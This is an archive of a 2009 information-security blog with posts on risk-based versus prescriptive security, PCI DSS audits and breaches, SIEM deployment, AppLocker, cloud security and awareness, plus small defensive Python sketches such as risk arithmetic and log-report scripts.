Friday, December 11, 2009

Shouldn't it be a "security professional friendly" website?

I received an e-mail from (ISC)2 about their new social network website. I tried to use it, but I got the following message: "Sorry, an error has occurred. You must be an (ISC)2 member and have JavaScript enabled in order to access the InterSeC Website. Please enable JavaScript in your browser, log back into the Member Website, and try again." OK... is it really uncommon for a security professional to browse with NoScript? Thumbs down to (ISC)2...

Friday, November 20, 2009

The security decision making WAVE!

I'm starting a Wave on Google Wave to build a collaboration piece on security decision making. Please send me your contact info if you want to participate.

It starts like this:
 


Security decision making

Dear security friends,

I've been planning for a long time to work on a paper/presentation about security decision making. I was planning to talk with different security professionals to hear about how their decision making process works and where it can be improved. But I've just realized that Google Wave is the perfect tool for a collaboration job like that. I will, of course, provide the proper credits to anyone who contributes. :-)

Well, some classification and taxonomy first. I think we could try to break decision making into:

- Scope: it can be from a single application to a whole organization. I'm quite sure that the process changes from one to another, so it makes sense to consider it.

- Type of decision: what is the goal of the decision? The most common are:

- Trade-offs: the famous control x productivity impact

- Cost: should I take the risk or pay to reduce/eliminate it

- Control Prioritization: among all those security controls, which one should I implement first?

- Risk prioritization: among all those risks, which one should I tackle first?

- Security optimization: considering all the resources available, how to deploy them in a way to maximize security (minimize risk)

- Method:

- Risk measurement: going through the vanilla process of measuring exposure, impact, threat level, likelihood and getting the resulting risk.

- Qualitative

- Quantitative: ROSI (a quick worked sketch appears after this list)

- Benchmarking: comparing what others are doing under similar situations

- Regulatory/compliance: doing it because it is required

- Metric based: this triggers the whole discussion about security metrics: what should be measured, how, and what the desirable values are.

- Trends:

- There are several issues with the risk assessment methodologies. I don't like the feeling of "educated guess" from the qualitative assessments, and there are a lot of conceptual failures on the ROSI side. Also, the data available is not good enough to generate good impact and likelihood numbers. Some researchers believe we should generate new models to avoid these pitfalls.

- Prescriptive standards: apply more prescriptive regulations, such as PCI DSS, to reduce the "interpretation" issues from more flexible frameworks and methodologies.
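Since the quantitative method above leans on ROSI, here is a minimal sketch of the usual arithmetic, with invented numbers just to show the mechanics (and how sensitive the result is to the guesses that feed it):

    # Hypothetical numbers only: the classic ALE/ROSI arithmetic.
    # ALE = Single Loss Expectancy (SLE) x Annual Rate of Occurrence (ARO)
    sle = 50_000.0            # estimated loss per incident ($)
    aro_before = 2.0          # incidents per year without the control
    aro_after = 0.5           # incidents per year with the control
    control_cost = 40_000.0   # annual cost of the control ($)

    ale_before = sle * aro_before             # 100,000
    ale_after = sle * aro_after               # 25,000
    risk_reduction = ale_before - ale_after   # 75,000

    rosi = (risk_reduction - control_cost) / control_cost
    print(f"ROSI = {rosi:.0%}")   # about 88% with these guesses; garbage in, garbage out

Shift the ARO guesses a little and the control flips from "worth it" to "not worth it", which is exactly the conceptual fragility mentioned under Trends above.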

So, I'll add people that I think will bring value to this discussion. Please feel free to expand the wave. Let's see where it will take us.

(I also don't know how to invite some people that I know are testing Wave but who are not showing up in my contact list... how do I do it?)

Some interesting references to consider/read about this subject:

http://infosecblog.antonaylward.com/2009/08/03/re-iso-27001-security-re-significant-impact-calculation-in-business/

http://taosecurity.blogspot.com/2006/06/risk-based-security-is-emperors-new.html

http://chuvakin.blogspot.com/2009/09/donn-parkers-risks-of-risk-based.html

http://chuvakin.blogspot.com/2009/09/is-risk-just-too-risky.html

http://www.bloginfosec.com/2009/09/28/classy-data-pt-3-%E2%80%93-ownership-and-risk/

Friday, October 23, 2009

One of those "quick updates"...

I'm ashamed that my blog has many more of these posts than it should, but yes, this is another one. I haven't posted anything here for some time; life has been a little more demanding than usual for other "stuff". My dog is quite sick (that's expected for a 17 year old dog, isn't it?) and almost all "free time" is being spent between taking care of her and doing all the "home stuff" that I usually share with my wife, as she is also studying a lot for her college tests. So, once again, I haven't given up on blogging, it's just a silent time for now. I'll be back when things become a little easier on this side.

Friday, September 25, 2009

Am I being contradictory?

I was reading the post that I just published when I noticed that the post right before it was complaining about attempts to standardize diversity, the curse of the "best practices". The funny thing is that in the last post I tried to make the case for a big standard, which would probably end up trying to do the same thing I was complaining about in the previous post. Pretty contradictory, isn't it?

It is, and I'm trying to see how these two different approaches can co-exist. One option, and I can see how cool that could become, is to create that big standard as a framework that would allow different implementations of the same process, but all following specifications for inputs and outputs. That would create a big standard with "sub-standard plugins", suggested implementations for specific processes. Each of those plugins would consider information from those threat modeling components I mentioned before, in a way that you could choose an implementation of a process that is more aligned to your organization's profile, technology and characteristics. That would avoid excessive standardization and also ensure that the basic necessary processes are in place. Now the two posts are not that incompatible anymore and I can go to sleep without that bugging me :-)

Risk-less security

I was happy to find Anton Chuvakin's post about the issues of doing security based on risk management a few days ago. As I said on my twitter, "discussions about decision making (risk based vs. others) is the only thing interesting for me today on the security field". Anton made a very good summary of why we should consider alternatives to risk management and who else is talking about it.

Honestly, I remember that when I first read that 2006 article from Donn Parker I was somewhat disappointed by his suggestion of doing things based on compliance. It was the old security sin of "checklist based security". All the recent discussions about PCI DSS are great sources of opinions and insights about the subject, and I'm seeing an overall perception from the security industry that it ended up being good for security. Is checklist based security working?

If PCI DSS is working, it's certainly not because of those approaching it with a checklist based mind. It is because it is a quite good prescriptive standard. It is clear about what organizations need to do. But it has limitations.

PCI DSS has a very clear goal: to protect card and cardholder data. The standard allows a quick and dirty approach for those that don't want to bother with all those requirements: reducing scope. Think about all those requirements about wireless networks. You have two choices: doing everything required by the standard or removing that network from the scope. With PCI, as long as you can prove that the cardholder data environment is protected, the rest can be hell, it doesn't matter, you are good to go. Is it wrong? Well, the standard has a clear goal and it makes sense to define the scope around it, but it is kind of naive in assuming that it's possible to isolate network environments inside the same organization without considering that the payment process (which uses card data) is usually very close to other core business processes. So, PCI DSS is a good standard, but it is limited for overall information security purposes.

With this in mind, one could say that creating a "generic PCI DSS" would be the solution for risk-less security. I think it is part of the solution, for sure. The problem is that the scope for that standard is considerably bigger, in a way that it would have to include some less prescriptive requirements. Is there a way of doing that without creating a new ISO27002? Don't get me wrong, I think ISO27002 is a great standard, but it is so open to interpretation that almost any beast can become a certified ISMS. Also, it has at its base the risk management process, which is exactly what we are trying to avoid. The new standard would have to include requirements to solve one of the biggest challenges in information security: prioritization.

Prioritization is the Achilles' heel of any attempt at doing security without risk management. After all, everybody knows that we cannot protect everything, and during the long implementation phases the bigger pains need to be addressed first. How can we do that without using that wizardry to "guess-timate" risks?

My take is that it should be done based on two sources of information: benchmarking and threat modeling. Threat models can be generated based on geographic aspects, organization and business profiles, and the technology in use. Threats for banks in the same context (same country, for example) are probably very similar. Organizations using the same basic software package on their workstations will share the same threats for that technology too.

We should also consider that a lot of the current threats organizations face are pervasive and ubiquitous; they affect almost any organization out there. Except for very few cases, malware issues are a common problem. Sure, the impact from malware issues will be different for each organization, but it seems to me that those characteristics will probably apply to many other threats too. How would a "risk-less" organization work to define its security strategy and the controls to implement? Most important, how would it check its own security status? Is it ok? Should it spend more? What needs to be improved?

That's where the fun is. And no, I don't have those answers. But building the processes and tools to do that is definitely the coolest thing to do in this field.
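To make the prioritization idea a bit more concrete, here is a toy sketch (the scoring, threat names and numbers are all invented, not a proposal for the real model) of how a "risk-less" ranking could combine a peer benchmark with a simple profile-based threat model:

    # Toy sketch: rank threats without a classic risk assessment, using
    # (a) how often peer organizations report the threat (benchmarking) and
    # (b) whether it applies to our technology/business profile (threat model).
    peer_benchmark = {            # share of peers reporting the threat (invented)
        "malware": 0.90,
        "sql_injection": 0.60,
        "wireless_intrusion": 0.20,
    }
    our_profile = {               # does the threat apply to our environment?
        "malware": True,
        "sql_injection": True,        # we expose public web applications
        "wireless_intrusion": False,  # no wireless near core systems
    }

    applicable = {t: p for t, p in peer_benchmark.items() if our_profile.get(t)}
    for threat, prevalence in sorted(applicable.items(), key=lambda kv: -kv[1]):
        print(f"{threat}: reported by {prevalence:.0%} of peers")

The interesting (and unsolved) part is where the benchmark data would come from, which is the whole point of the discussion above.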

Wednesday, September 9, 2009

Standardizing diversity - does it work?

Probably not enough content for a post, but certainly for a tweet :-)

It's common to see in security standards, frameworks and best practices a lot of "standard" ways of doing things like access control and patch management. The problem is that organizations are extremely different from each other, not only in technology but also in processes and culture. It's pretty hard to suggest a standard process that will interact with so many different components and expect it to work (and perform) in the same way for all implementations.

We should try to avoid standardizing diversity and start selling the basic concepts behind each of those processes; usually, the expected outcome. For Access Control, we should state that the process should provide least privilege, segregation of duties and accountability. For Patch Management, reducing the vulnerability window and the "exploitability" of systems.

I'm tired of seeing people struggling to fit "best practice processes" to their organizations (and the other way around) instead of trying to achieve the desirable outcomes. That's a waste of resources and usually puts security directly against productivity.

When implementing a security process, think about the desired outcome first. You'll probably find some different ways to get the results, then just pick the one that is more aligned to your organization. Remember to document how the new process achieves that, as you probably will not find auditors with this open mind out there. Let them call your process a "compensatory control", as long as it works and does not make everybody nuts :-)

Tuesday, September 8, 2009

Flash updates and firefox

New Firefox versions will warn you when your Flash plugin is out of date. This is a cool idea and will help users who are not aware of the need to update software like Flash and Acrobat Reader. I can also see this as the beginning of a trend to centralize the updating of all the crap we run on the client side. Microsoft (and Mozilla, Apple, Google) already have a very good update system for their software. By opening it to other software vendors via a public API, it could be used as a single source of updates. Adobe, instead of deploying its own update system, could simply publish its updates through the Windows Update system. To avoid non-authorized updates, the user could be asked the first time whether he wants to allow that organization to update its software through the system, with the identity being verified through digital certificates. That would certainly help users keep their software updated and reduce the number of agents checking all the time whether there are updates to be installed. Please guys, let's simplify this mess.
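Nothing like this API exists today, so treat the following as a purely hypothetical sketch of the "approve a publisher once, verify its certificate afterwards" idea, reduced to a pinned-fingerprint check with made-up names:

    # Hypothetical sketch of first-use publisher approval for a central updater.
    # A real implementation would validate a full certificate chain, not a bare hash.
    import hashlib

    approved_publishers = {}  # publisher name -> pinned certificate fingerprint

    def fingerprint(cert_bytes: bytes) -> str:
        return hashlib.sha256(cert_bytes).hexdigest()

    def approve_on_first_use(publisher: str, cert_bytes: bytes, user_accepted: bool) -> None:
        # The user is prompted once; afterwards the decision is remembered.
        if user_accepted:
            approved_publishers[publisher] = fingerprint(cert_bytes)

    def accept_update(publisher: str, cert_bytes: bytes) -> bool:
        # Deliver the update only if this publisher was approved before and
        # presents the same certificate it was approved with.
        return approved_publishers.get(publisher) == fingerprint(cert_bytes)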

Thursday, September 3, 2009

New AppLocker from MS - Some improvements

I was reading this article about AppLocker, the application control system from Microsoft that runs on Windows Server 2008 R2 and Windows 7 clients. There seem to be some very good improvements there, especially the "automatic rule creation" part. In short, an organization can build its "gold image" desktop, with all necessary apps, and run the automatic rule creator to identify all the applications that will be on the whitelist of things that can run on the desktop. If you are mature enough to have a really good "gold image", that shouldn't be very hard to do.

The issue that I can see is with patches and updates. However, the automatic rule creation can work with the Publisher information when the binaries are signed, making it easier to accept new versions of those files. I think I'll try that in a lab to see how effective it is.

Another interesting thing is that you can enable it in an "audit only" mode. My personal view on whitelist based controls is to deploy them to generate logs only and monitor them using a SIEM or similar system. That way the risk of disrupting the environment is reduced and exceptions can be managed on two levels (changing the whitelist, ignoring specific alerts from the controls). It is one of the best ways to do security without breaking everything, and it also gets more value from a SIEM deployment. Be aware, however, that the SIEM system alone will not perform any miracles; this concept can only work when you have people and processes in place to deal with the generated alerts and to constantly tune the rules. That's the price to pay for more flexible security.
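As a rough illustration of the "audit only plus SIEM" idea (this is not AppLocker-specific code; the event fields and the trusted publisher names are assumptions about whatever export format you end up forwarding), the triage logic boils down to: known-good publisher, candidate for a whitelist change; known noisy path, documented exception; everything else, an alert for a human:

    # Sketch of two-level exception handling for whitelist audit events.
    # Field names ("publisher", "path") are assumptions about the exported log format.
    TRUSTED_PUBLISHERS = {"O=MICROSOFT CORPORATION", "O=ADOBE SYSTEMS"}   # examples only
    SUPPRESSED_PATHS = {r"C:\LegacyApp\updater.exe"}  # known noise, alert ignored

    def triage(event: dict) -> str:
        if event.get("publisher") in TRUSTED_PUBLISHERS:
            return "candidate for whitelist rule update"
        if event.get("path") in SUPPRESSED_PATHS:
            return "suppress alert (documented exception)"
        return "raise alert for analyst review"

    print(triage({"publisher": "O=UNKNOWN VENDOR", "path": r"C:\Temp\tool.exe"}))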

Wednesday, August 26, 2009

Sign Seth Hardy's petition for (ISC)2 Board of Directors ballot

Folks, this is serious and important. A lot of us have several complaints about the way the CISSP certification is modeled, the quality of the questions and how it is interpreted by the industry. Seth Hardy is asking for support to be included in the (ISC)2 Board of Directors election ballot. He needs 633 signatures on his petition in order to be included. Here are Seth's objectives for joining the Board:

I want to make the certification exams offered by (ISC)2 more respected on a technical level. While I understand that the exams are not focused on technology -- "Security Transcends Technology", even! -- this is not a valid reason for exams that have outdated, misleading, or incorrect material.

I want greater accountability from (ISC)2 to its members. This is focused on (but not limited to) exam procedure and feedback. If there is a problem, it should be acknowledged and addressed in a reasonably transparent manner.

I want the purpose and scope of the (ISC)2 certifications to be well-defined. The CISSP certification is considered the de facto standard for technical security jobs; if it is not designed to do this, there should be clear guidelines from (ISC)2 on where it is appropriate and inappropriate to be gauging the skill and qualifications of a job applicant depending on whether they have the certification.

You can sign his petition at http://sethforisc2board.org/



Friday, August 21, 2009

On the technical details of the breaches

We finally have some information about what really happened in the Heartland, Hannaford and 7-Eleven breaches.

Even if the initial SQL injection was in an SSL connection (my assumption is that there was no initial reaction due to lack of detection), the rest of the attack should still be easy to detect. What are these companies doing about network security monitoring and intrusion detection? It seems to me that this is a point where the current PCI-DSS requirements might not be sufficient. Requirements 10, 11.4 and 11.5 are good candidates to be improved.


Thursday, August 20, 2009

Good risk management leads to Compliance?

This is a quite logical line of thought, but there is one catch. Not all regulations are created in order to reduce risk to the party that is responsible for applying the controls and will go through compliance validation. Think about PCI-DSS compliance by merchants. It tries to reduce risk for card brands, issuers and acquirers by forcing the key point of compromise (merchants) to apply the proper controls. However, the cost for the merchant to apply those controls is higher than the risk reduction it will get. That's why fines are usually established by regulating bodies: to artificially increase the risk to the entity that is responsible for applying the controls. If this "manipulation of the risk economy" is not properly done, the "good risk management leads to compliance" concept does not work.
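A quick back-of-the-envelope example, with numbers invented purely to show the mechanics of that manipulation:

    # Hypothetical numbers: why fines exist in the merchant's risk equation.
    control_cost = 500_000.0           # cost for the merchant to implement the controls
    merchant_breach_loss = 100_000.0   # merchant's own expected loss from a breach
    breach_probability = 0.10
    fine_if_breached = 5_000_000.0     # fine applied when a breach hits a non-compliant merchant

    risk_without_fine = breach_probability * merchant_breach_loss                    # 10,000
    risk_with_fine = breach_probability * (merchant_breach_loss + fine_if_breached)  # 510,000

    print("comply?", risk_without_fine > control_cost)  # False: a rational merchant skips the controls
    print("comply?", risk_with_fine > control_cost)     # True: the fine flips the decision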


Robert Carr, PCI, QSAs...

I tried to resist posting about this last discussion. For those who are not aware of it, a very quick overview:

  1. Payment processing company (Heartland) had a breach, leaking thousands of credit card records
  2. Heartland's CEO complains that they went through the regular PCI-DSS audit and the QSA had not pointed out the issues related to the breach
  3. The security industry goes mad about his complaints: "compliance is not security", "compliant at that time doesn't mean always compliant", "PCI-DSS is just a set of minimum requirements", the QSA report is just information based on their own honesty, etc, etc, and finally, "he should know all that".
I agree with my peers on almost everything that was said on #3, but I'd like to point to some issues here. First, there is a kind of "cognitive dissonance" about PCI-DSS in our industry. It is sold (not by everybody, I must say) to high level executives as the best thing since sliced bread for breach risk reduction, but when something happens we promptly start saying that it is just an initial step in a longer journey, it is composed only of minimum requirements and so on. Think for a while about all the things you heard people saying while briefing executives about PCI-DSS and trying to get a budget to implement the requirements; have they always made clear all the limitations of PCI in terms of risk reduction?

I'm trying to see this episode through my "CEO glasses". I imagine what I would do if someone came to me asking for money to implement requirements from a regulation that will do little to reduce my risk; wouldn't the standard sound worthless to you? Also, I need to hire a company, trained by the organization that created the standard, to tell me if I'm in compliance with it. Assuming that I did that with the best intentions, provided my CSO with all the necessary resources to stay in compliance and not just be in compliance at audit time, shouldn't I assume that if a breach occurs it's valid to verify whether the breach occurred because of conditions that should have been identified by the auditors? And, in that case, that they share the responsibility?

I'm not necessarily saying that it is right or wrong, just that it seems very reasonable to me that CEOs would follow this line of thought. To be honest, I'm not the only one thinking like this. This post from the New School of Information Security blog goes along the same lines.


Friday, August 14, 2009

Don't worry about security reputation IF...

There is an ongoing discussion on some forums about the "fallacy" that the damage to an organization's security reputation due to a security incident is not as bad as security professionals like to say. This is based on this post from Larry Walsh.
I'm sure there is a lot of exaggeration about the effects of an incident. Some businesses tend to feel the effects of an incident more than others, for instance. We can tell that the retail business can survive pretty much unharmed by an incident, as we saw with TJX and so many others. But what about payment services companies?
Two really interesting examples are CardSystems and Heartland. CardSystems is out of business because of its incident. Heartland is surviving, but take a look at their share price:

The effects of the incident (see that big drop in January?) are clear and it will take time to recover from it. The company is spending a lot of money to rebuild its credibility; there is a real impact on the value of the organization. One can argue that part of the impact is due to the financial risk from litigation and fines, not to reputation only. That's true, but I'm sure that even without considering that we would still see a considerable impact.
Can the impact be zero? Yes, it can, but it depends on a series of factors, like the organization's business, the details of the incident (what type of information leaked, how it happened) and how the organization dealt with it.


Monday, August 10, 2009

These are the vulnerabilities I'm worried about

For those who are addicted to vulnerability information feeds, you are probably already aware of the XML library data parsing vulnerabilities. This is the kind of vulnerability that creeps me out. When you've got vulnerabilities related to an easily identifiable piece of software, like "Windows 2008", "Firefox 3.5" or "Java Runtime Environment 6", it is easy to understand whether you are vulnerable or not.

When the issue is in libraries, libraries that are used everywhere, this thing becomes a nightmare. You are now relying on the ability of all your software providers (COTS software and "tailored" stuff) to identify the usage of those libraries in their products, and also on the ability of your developers to do the same. Does your vulnerability management process include a procedure to check with developers whether they are using vulnerable libraries? Do you track libraries in those processes too? I haven't seen that being done out there.

There are lots of file scanning technologies deployed everywhere: antivirus, content discovery, DLP. Can we leverage those technologies to look for the presence of vulnerable libraries? I wonder if someone is already doing that...
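Something in the spirit of what I'd like those scanning technologies to do, reduced to a toy sketch (the hash below is a placeholder; in practice you would need vendor-published hashes or version fingerprints for the affected library builds):

    # Toy sketch: walk a directory tree and flag files whose hashes match
    # known-vulnerable library builds. The hash value below is a placeholder.
    import hashlib, os

    KNOWN_VULNERABLE = {
        "d41d8cd98f00b204e9800998ecf8427e": "example vulnerable XML parser build",
    }

    def file_hash(path):  # md5 used only as a lookup key here, not for security
        h = hashlib.md5()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(65536), b""):
                h.update(chunk)
        return h.hexdigest()

    def scan(root):
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                if name.lower().endswith((".dll", ".so", ".jar")):
                    full = os.path.join(dirpath, name)
                    try:
                        digest = file_hash(full)
                    except OSError:
                        continue
                    if digest in KNOWN_VULNERABLE:
                        print(f"{full}: {KNOWN_VULNERABLE[digest]}")

    # scan("/opt")  # point it at application directories, not the whole disk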

Friday, August 7, 2009

Risk intuition and security awareness

Schneier has written a very good post on "Risk Intuition" and risk perception in general. This part was particularly interesting:

"[...] I listened to yet another conference presenter complaining about security awareness training. He was talking about the difficulty of getting employees at his company to actually follow his security policies: encrypting data on memory sticks, not sharing passwords, not logging in from untrusted wireless networks. "We have to make people understand the risks," he said.

[...]

"Fire someone who breaks security procedure, quickly and publicly," I suggested to the presenter. "That'll increase security awareness faster than any of your posters or lectures or newsletters." If the risks are real, people will get it."

He is totally right about it. Employees very quickly perceive the organization's posture on its own rules. Everyday decisions are usually based on personal risks, not on organization related risks. The employee is thinking mostly about the risk to his performance and to his job, not to the company itself. If people start to be punished for security policy violations, this "personal risk" starts to be considered in decisions like forwarding internal mail to external accounts and sharing passwords.

I had the opportunity to witness changes in people's behaviour caused by changes in management posture before. In one of these cases a group of developers used to share passwords among their group to "keep things running while they are away" and were encouraged by their manager to do so. They immediately changed this behaviour as soon as that manager was publicly reprimanded by his director for promoting bad security practices and warned that it would be formally punished if identified again.

The other case, at the same organization, was related to prohibited content being accessed on the Internet. We didn't have content filtering at that time, but by using some simple Perl scripts and proxy logs I was able to trigger the process of warning managers about abuse by the biggest offenders. The actions taken by those managers (strongly encouraged by higher management) based on those warnings triggered a huge change in behaviour from all users, which could be clearly noted in the next month's logs. People just realized that there was a real risk related to that behaviour, so they changed it. An interesting fact about this case was that some users went the other way and started using things like proxy websites to avoid the controls. The same mechanism (reporting users doing that) that triggered this behaviour was also used to reduce it. Users doing that were punished, and the message that Internet access was being monitored and that attempts to abuse it would be punished was clearly received.
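The original scripts were quick-and-dirty Perl that I no longer have; a minimal sketch of the same idea (assuming a Squid-like access log with whitespace-separated fields, and a crude keyword match standing in for real categorization) would look like this:

    # Sketch of the "top offenders" report from proxy logs.
    # Field positions and the keyword list are assumptions; adjust to your proxy format.
    from collections import Counter

    URL_FIELD, USER_FIELD = 6, 7
    FLAGGED_WORDS = ("poker", "torrent", "adult")   # illustration only

    def top_offenders(log_path, limit=10):
        counts = Counter()
        with open(log_path) as log:
            for line in log:
                fields = line.split()
                if len(fields) <= USER_FIELD:
                    continue
                url, user = fields[URL_FIELD].lower(), fields[USER_FIELD]
                if any(word in url for word in FLAGGED_WORDS):
                    counts[user] += 1
        return counts.most_common(limit)

    # for user, hits in top_offenders("access.log"):
    #     print(user, hits)   # this is the list that went to the managers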

So, if you want to know what's the best investment in security awareness: real punishment of violations. Change the employee's personal risk/reward equation.



Friday, July 24, 2009

+/- 40% accuracy and we think it's good?

I was caught by surprise while reading Matthew Rosenquist's post on the IT@Intel blog by this information about the OCTAVE methodology:

"I have observed the accuracy to be +/- 40% in complex organizations.  I believe this is largely due to multiple tiers of qualitative-to-quantitative analysis and the bias introduced at each level.  Credible sources have expressed a better +/- 20% accuracy for smaller implementations."

Even if Matthew is defending the use of the methodology, these are very strong numbers for me. I cannot see how a methodology with this level of accuracy can be much better than a quick and dirty threat and impact assessment, at least for gathering supporting information for a security strategy definition.
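To put those error bars in perspective with a trivial, made-up example:

    # +/- 40% accuracy in practice: two risks you probably cannot even rank.
    risk_a, risk_b = 900_000.0, 1_100_000.0    # hypothetical point estimates ($)
    band = 0.40
    range_a = (risk_a * (1 - band), risk_a * (1 + band))   # 540,000 .. 1,260,000
    range_b = (risk_b * (1 - band), risk_b * (1 + band))   # 660,000 .. 1,540,000
    print("ranges overlap:", range_a[1] > range_b[0])      # True: the ranking is not supported

If the whole point of the exercise is to decide which risk to treat first, overlapping ranges like these don't help much.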

I was always a very big fan of risk based methodologies and frameworks like ISO27002. However, they all seem to suffer from a "first steps syndrome": they are extremely hard to put in motion and it takes a long time before they start to be effective. Eventually, after a couple of years, you'll start to get some good results. But until you get there you're probably exposed and have some serious gaps in your security posture.

This is not just a case of fixing the urgent gaps first and then starting everything "the right way". The gap fixing will become never-ending firefighting and will suck up the time and resources needed for the big stuff. What we need is a way to reach a desirable end state through a series of actions that solve immediate issues while staying on the path toward that state. And how is that possible?

I'm still not sure, but I'm trying to put something together in that way. That would include:

  • More prescriptive directions (like PCI-DSS)
  • Quick and dirty, facts based threat assessment
  • Actions prioritization based on immediate outcome, reach (threats and assets related) and increasing value over time
  • Outcome based metrics



Friday, July 17, 2009

NMAP 5 released

It's kind of stupid to post it in yet another blog, but this will be just a quick note to mention the new NMAP version and also point to a very good post on the SecuriTeam blog about what's new in the new version. A very good summary.

Friday, July 3, 2009

Dunbar's number and security

I've just finished Malcolm Gladwell's book The Tipping Point. As usual, Gladwell's books always bring food for thought on security for me. Security is deeply related to human behaviour, the main subject of his books. The most interesting thing from TP for security is Dunbar's number. Honestly, when I read about it I thought I'd found something like the famous 42, but it is, in fact, some serious and important stuff for our field.

The basic concept of Dunbar's number is that people have a limit on the number of people with whom they can maintain stable social relationships. The actual number, 150, was found in several independent studies, including some new ones about social networking websites like Facebook. The implications of this "hard-coded limit" go beyond the number of "friends" you can have, as it also relates to the number of people you can interact with while maintaining a personal context, the maximum number of people you can put together as a cohesive group; the list of implications is huge.

It's easy to extrapolate it to security. I can clearly see how it would impact Security Awareness initiatives. It's common to see those initiatives trying to use people as champions for their work groups and departments. Dunbar's number can be used as a rule to define how many champions are necessary and for which groups. It can also be used to define processes around access verification and entitlement review, as we can probably expect that a manager won't be able to effectively answer for the "need to know" characteristics of a group bigger than 150 people.

Of course, all these theories need to be tested. However, we must always remember that systems are not only systems to be secured; they have a purpose and they need to perform properly. People are not just "users", they are also human beings. Information is not only data to be protected; it has an infinite range of meanings and contexts. All the research and findings about Dunbar's number and its applicability to Information Security are just another example of why it is so important for security professionals to constantly look into other fields for useful information.

Friday, June 19, 2009

SIEM value

There are a lot of interesting discussions about the value of SIEM solutions. There are also some discussions about the possibility of doing it with open source, like OSSIM (I personally think it is possible for some organizations, especially those that already have an open source culture).

I like to say that SIEMs are for security what ERP systems are for enterprise management. There is huge value in deploying those systems, but you need to be aware that the implementation process is not easy, it takes time and it requires a lot of commitment from the organization. It's not just "pay software, pay hardware, a bunch of consultants, done". Most of the time you need to create or adapt a lot of processes to start working with the new tool. You need to understand the data that you will be working with. Just like for ERPs, where you need to have total control over how your books work in order to automate and improve them, you also need to understand how your network and systems work in order to get any value from SIEMs.

IDSes suffered a lot when they were deployed without the necessary services and (the right) people to manage and operate them. SIEMs are no different in this respect, and they may be even more sensitive about it, because they rely on receiving data from lots of different sources. If those who are responsible for those sources are not in the same boat as you and are not aware of the value of the tool, they have the power to make that SIEM a nightmare to manage. In order to get value from a SIEM, you need to be able to get the data from the systems you identify as necessary and keep that data flowing! How many places do you know where the biggest SIEM related activity is troubleshooting why the logs are not coming in? If you cannot feed the beast, it won't fly.
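Keeping the data flowing is worth automating from day one. A minimal sketch of a "feed the beast" check, assuming you can query the timestamp of the last event received per source (how you get that depends entirely on your SIEM):

    # Sketch: flag log sources that stopped sending events to the SIEM.
    # last_event_by_source would come from whatever API or database your SIEM exposes.
    from datetime import datetime, timedelta

    def silent_sources(last_event_by_source, max_silence=timedelta(hours=1)):
        now = datetime.utcnow()
        return [src for src, last in last_event_by_source.items()
                if now - last > max_silence]

    feeds = {
        "core-firewall": datetime.utcnow() - timedelta(minutes=5),
        "dmz-webserver": datetime.utcnow() - timedelta(hours=9),  # someone "fixed" syslog again
    }
    for src in silent_sources(feeds):
        print(f"ALERT: no events from {src} for over an hour")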

Thursday, June 11, 2009

Looking at things through "cloud glasses"

I was happy to see the latest posts from Alan Shimel about the incident at LxLabs and what it means for "cloud security". Not only because I think he is right about using it as an example of why we should think about cloud security, but also because I like his "anti-hype" posture. Ok, that specific incident may be related to only one of the several aspects that define "the cloud" (according to Hoff, "multi-tenancy" - and the implications are mostly for "public Cloud providers"), but that doesn't mean there are no implications for cloud security discussions. And I'll try to go even further in this analysis.

If you look at the incident characteristics it's easy to relate it only to multi-tenancy environments, but it can also be seen as a sign of the higher impact (and rewards to attackers) of components leveraged by multiple users, users being not only multiple organizations but also multiple applications, guest OSes, networks or anything else that can share a common resource base. Sharing an (elastic, on demand, whatever) common resource base is probably one of the key concepts of cloud computing, so yes, we should connect that incident to cloud security. It's not a "one to one" relationship, but it makes sense to look into the causes and effects of that fact through "cloud glasses" (WOW, I've just created a cloud-hype term!). And that's also why I think that Schneier is not completely wrong when he says that we have been there before. We have been sharing computing resources for some time; let's look into the old stuff without prejudice and see which lessons learned at that time can be applied to the new context. I'm sure we can use a few.

One interesting aspect that can be highlighted from this incident is how sharply the security dependencies can increase when you start to leverage cloud based services. Suddenly, the security of your data starts to depend not only on the security of the software and hardware that you own, but also on the security of the software and hardware of the several service providers that are part of that offering. So, you are using SaaS from X? Ok, and they are running their application over PaaS from Y, who operates over IaaS from Z. You are seeing X, but your security now depends on X, Y and Z. How can we do risk assessment for that? I'm not saying that it's good or bad, just that it has interesting implications for risk management and trust.
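The dependency chain also compounds in an unpleasant way. A toy calculation, with invented probabilities and the (questionable) simplification that the providers' failures are independent:

    # Toy math: your exposure is the chain X -> Y -> Z, not just X.
    p_no_incident = {"X (SaaS)": 0.99, "Y (PaaS)": 0.98, "Z (IaaS)": 0.97}

    chain = 1.0
    for provider, p in p_no_incident.items():
        chain *= p
    print(f"P(no incident anywhere in the chain) = {chain:.3f}")   # ~0.941, worse than any single link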

Yes Alan, cloud security matters and LxLabs is a very good example to use.

Friday, June 5, 2009

Suing the auditor? Sure!

The PCI-DSS world has just gone mad this week after Merrick Bank decided to sue Savvis, who gave a clean bill of health to the well known service provider CardSystems, responsible for a huge breach that led to thousands of card numbers being stolen.

It is an interesting outcome and raises a series of questions about whether it's valid/reasonable to sue an auditor after a breach. Some PCI specialists promptly said it should not happen, as the auditor's report is related only to a specific point in time and cannot be taken as a guarantee that nothing will happen in that environment. However, I believe there are situations that could lead to a lawsuit like that. If the breach happened through something that goes against a PCI requirement and it was there at the time of the audit, it was probably something that should have been identified by the auditors, so they screwed up.

- "Please show me where I'm screwing up."
- "Don't worry, you are ok, go for it!"
...something happens... you've just opened a can of worms!

Can you show that it was something that the auditors should have found? Was it there at that time? Were all questions answered properly? There are other interesting situations - things tested by sampling, incorrect scope definitions, among others.

PCI is suffering from the same pain that SOX suffers, but it will be easier to deal with as it is more prescriptive. Auditors now need to be even more careful about their methodologies - are they doing sampling properly? Are they being careful about the definition of the audit scope? Are they properly recording the answers provided by the audited organization? That's how they need to work to protect themselves from being sued by compromised clients. That, and raising their prices to build a reserve for eventual legal expenses. One can expect PCI audits to become more expensive if the trend is confirmed.

An interesting outcome is that for companies being audited, this is an additional reason to be completely transparent during a PCI audit. If you have the option to sue the auditor later, you should do everything to ensure that they won't miss anything because of your actions and answers, as that would release them from liability. Also, another player will become extremely important: the forensics guy. He'll be the one who has to go through all the evidence from the breach investigation and from the audit process to check whether there is a case for a lawsuit.

Auditors protecting themselves by being more careful, audited companies protecting themselves by being more transparent, bad auditors paying for their incompetence. Aren't these good reasons to allow those lawsuits to happen?

Wednesday, May 20, 2009

Risk assessment science

